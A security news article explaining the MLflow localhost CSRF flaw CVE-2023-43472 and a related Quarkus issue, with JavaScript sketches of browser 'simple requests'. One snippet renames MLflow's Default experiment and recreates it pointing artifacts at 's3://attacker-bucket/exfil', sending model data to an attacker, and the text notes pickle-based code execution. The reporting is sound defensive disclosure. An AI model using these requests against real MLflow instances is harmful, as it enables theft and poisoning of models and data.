MLflow vulnerability enables remote machine learning model theft and poisoning

This has been a pivotal year for generative artificial intelligence (AI). The release of large language models (LLMs) has showcased how powerful the technology can be at making business processes more efficient, and many organizations are now racing to adopt generative AI and train models on their own data sets.

Developing and training AI models is a costly endeavor, and the resulting models can easily become some of the most valuable assets a company owns. It’s therefore important to keep in mind that these models are susceptible to theft and other attacks, and that the systems hosting them need strong security protections and policies in place.

A vulnerability recently fixed in MLflow, an open-source machine-learning lifecycle platform, highlights how easily attackers could steal or poison sensitive training data when a developer simply visits a malicious website from the same machine where MLflow runs. The flaw, tracked as CVE-2023-43472, was patched in MLflow 2.9.0.

Localhost attacks via rogue JavaScript code

Many developers believe that services bound to localhost — a computer’s internal hostname — cannot be targeted from the internet. However, this assumption is incorrect, according to Joseph Beeton, a senior application security researcher at Contrast Security, who recently gave a talk on attacking developer environments through localhost services at the DefCamp security conference.

Beeton recently found serious vulnerabilities in the Quarkus Java framework and in MLflow that allow remote attackers to exploit features in the development interfaces or APIs those applications expose locally. The attacks only require the victim to visit an attacker-controlled website in their browser, or a legitimate site where the attacker managed to place specially crafted ads.

Drive-by attacks have been around for many years, but they remain powerful when combined with a cross-site request forgery (CSRF) vulnerability in an application. In the past, hackers used drive-by attacks through malicious ads placed on websites to hijack the DNS settings of users’ home routers.

Normally, browsers only allow JavaScript code to make requests to resources from the same origin (domain) as the script. A mechanism called cross-origin resource sharing (CORS) can relax this restriction and allow scripts to make requests across different origins, but only if the target server explicitly permits it.

For example, if JavaScript code loaded in the browser from domain A tries to make a request to domain B, the browser will first issue a so-called preflight request to check whether domain B has a CORS policy that allows scripted requests from domain A. This applies to localhost as well, but Beeton points out that there is another type of request, called a simple request, that most browsers (except Safari) still allow without a preflight because it predates CORS. Such requests are used, for example, by the HTML <form> element to submit data across origins, but they can also be triggered from JavaScript.

A simple request can use the GET, POST, or HEAD method and the content type application/x-www-form-urlencoded, multipart/form-data, or text/plain (or no content type at all). The limitation is that the script making the request won’t get any response back unless the target server opts in through the Access-Control-Allow-Origin header.
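What follows is a minimal sketch of such a simple request fired from JavaScript on an attacker-controlled page; the endpoint URL and body are hypothetical placeholders. Because the method and content type fall within the simple-request rules, the browser sends it without a CORS preflight:

    // Sketch: a cross-origin simple request sent from a malicious page.
    // text/plain is a CORS-safelisted content type, so no preflight occurs.
    // The response comes back opaque, but the attacker never needs to read it.
    fetch("http://localhost:5000/some/endpoint", {    // hypothetical endpoint
      method: "POST",
      mode: "no-cors",
      headers: { "Content-Type": "text/plain" },
      body: "data the target server will act on",     // hypothetical payload
    });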

From an attack perspective, though, getting a response back is not really required as long as the intended action triggered by the request happens. This is the case for both the MLflow and Quarkus vulnerabilities.

Stealing and poisoning machine-learning models

Once MLflow is installed, its user interface is accessible by default at http://localhost:5000, and it exposes a REST API through which actions can be performed programmatically. Normally, API interaction happens through POST requests with a content type of application/json, which is not a content type allowed for simple requests.
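For contrast, here is a sketch of what a legitimate cross-origin call to the API would look like; because application/json is not a simple-request content type, the browser would first send a preflight, which MLflow does not approve, and the call would be blocked (the payload is illustrative):

    // Sketch: a normal JSON API call. Made cross-origin, the application/json
    // content type forces a CORS preflight; the preflight fails, so the
    // browser never sends the actual request.
    fetch("http://localhost:5000/api/2.0/mlflow/experiments/create", {
      method: "POST",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify({ name: "my-experiment" }),  // illustrative payload
    });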

However, Beeton found that MLflow’s API did not check the content type of requests, so it also accepted requests with a content type of text/plain. This opens the door to remote cross-origin attacks through the browser via simple requests.

The API offers only limited functionality, such as creating a new experiment or renaming an existing one, but not deleting experiments. Conveniently for attackers, the default experiment in MLflow to which new data is saved is called “Default,” so attackers can first send a request to rename it to “Old” and then create a new experiment, which will now be called “Default” but have an artifact_uri pointing to an external S3 storage bucket under their control.
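Here is a sketch of that two-step sequence as simple requests, assuming MLflow’s documented REST endpoints (experiments/update to rename, experiments/create to create) and the default experiment ID of 0; the bucket name is a placeholder:

    // Sketch: hijack the "Default" experiment via two simple requests.
    // The vulnerable server parsed JSON bodies even when sent as text/plain.
    const api = "http://localhost:5000/api/2.0/mlflow/experiments";

    // Step 1: rename the existing "Default" experiment (ID 0) to "Old".
    fetch(`${api}/update`, {
      method: "POST",
      mode: "no-cors",
      headers: { "Content-Type": "text/plain" },
      body: JSON.stringify({ experiment_id: "0", new_name: "Old" }),
    }).then(() =>
      // Step 2: recreate "Default" with artifacts stored in an
      // attacker-controlled S3 bucket (placeholder name).
      fetch(`${api}/create`, {
        method: "POST",
        mode: "no-cors",
        headers: { "Content-Type": "text/plain" },
        body: JSON.stringify({
          name: "Default",
          artifact_location: "s3://attacker-bucket/exfil",
        }),
      })
    );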

“Once a new MLflow run is done — e.g., mlflow run sklearn_elasticnet_wine -P alpha=0.5 --experiment-name Default — the result of the run will be uploaded to the S3 bucket,” Beeton explained in a blog post. This would allow the attacker to obtain a serialized version of the ML model as well as the data that was used to train it.

The attacker could take it even further. “Given that an ML model is stored in the bucket, there would be potential to poison the ML model itself,” the researcher said. “In such an attack, an adversary is able to inject bad data into the model’s training pool, causing it to learn something it shouldn’t.”

Remote code execution can often be achieved

Remote code execution might also be possible if the attacker modifies the model.pkl file to inject a Python pickle exploit, since pickle deserialization can execute arbitrary code when the model is loaded. Remote code execution was likewise the outcome of the Quarkus vulnerability Beeton found, which was exploitable via simple requests from remote websites because the application’s Dev UI was bound to localhost and had no additional protection against cross-site request forgery attacks.

“As I demonstrated during [the] DefCamp talk, it is possible to generate a remote code execution (RCE) on the developer’s machine or on other services on their private network,” the researcher said. “Given that developers have write access to codebases, AWS keys, server credentials, etc., access to the developer’s machine gives an attacker a great deal of scope to pivot to other resources on the network, as well as to either modify or to entirely steal the codebase.”
